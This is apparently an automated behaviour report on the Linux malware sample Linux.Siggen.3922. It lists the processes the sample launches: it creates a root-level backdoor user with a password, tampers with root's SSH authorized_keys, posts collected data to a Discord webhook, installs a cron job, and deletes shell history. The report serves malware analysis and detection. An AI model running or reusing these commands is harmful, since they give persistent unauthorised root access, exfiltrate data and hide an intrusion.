Linux.Siggen.3922

To ensure autorun and distribution:

Creates or modifies the following files:

Malicious functions:

Gets access to SSH keys

Launches processes:

/bin/bash <SAMPLE_FULL_PATH> -c exec '<SAMPLE_FULL_PATH>' \"$@\" <SAMPLE_FULL_PATH>
<SAMPLE_FULL_PATH>
/bin/bash <SAMPLE_FULL_PATH> -c
/usr/bin/curl -s -connect-timeout 4 -m 4 ifconfig.me
rm -rf *timeout
whoami
date +%m/%d/%Y
mkdir /var/tmp/.ladyg0g0/
id -u
sleep 0.5
cat /var/tmp/.ladyg0g0/.pr1nc35
chmod 777 .report_system
grep -q sclipicibosu
cat /etc/passwd
/usr/sbin/useradd -u0 -g0 -o -s /bin/bash sclipicibosu
nscd -i passwd
nscd -i group
usermod -aG sudo sclipicibosu
passwd sclipicibosu
yes saieilamuie
mkdir /usr/.SQL-Unix
mkdir /usr/.SQL-Unix/.SQL
uname -a
chattr -i /root/.ssh
chattr -i /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
chattr +i /root/.ssh/authorized_keys
/usr/bin/curl -H Content-Type: application/json --data @/tmp/.send.json https://discord.com/api/webhooks/836229652590362665/iVuulOvHrndM3MlSv67bbNtexjTabmcLHGUcMAobE7z-D6e8YSgJOAlzqzdNfr1JSq29
grep -q .black
crontab -l
rm -rf /root/.5p4rk3l5
sleep 1
crontab /root/.5p4rk3l5
rm -rf /root/.bashrc
rm -rf /root/.bash_history
chmod 777 /root/.b4nd1d0
/root/./.b4nd1d0
pgrep -x .report_system
/root/./.report_system
bash -c yum install -y rsync >/dev/null 2>&1 & disown
cp -avr /root /usr/bin/.locationesclipiciu
chmod 777 /usr/bin/sshd
chmod 644 /lib/systemd/system/myservice.service

Performs operations with the file system:

Modifies file access rights:

Creates folders:

Creates symlinks:

Creates or modifies files:

Deletes files:

Other:

Collects CPU information

Collects RAM information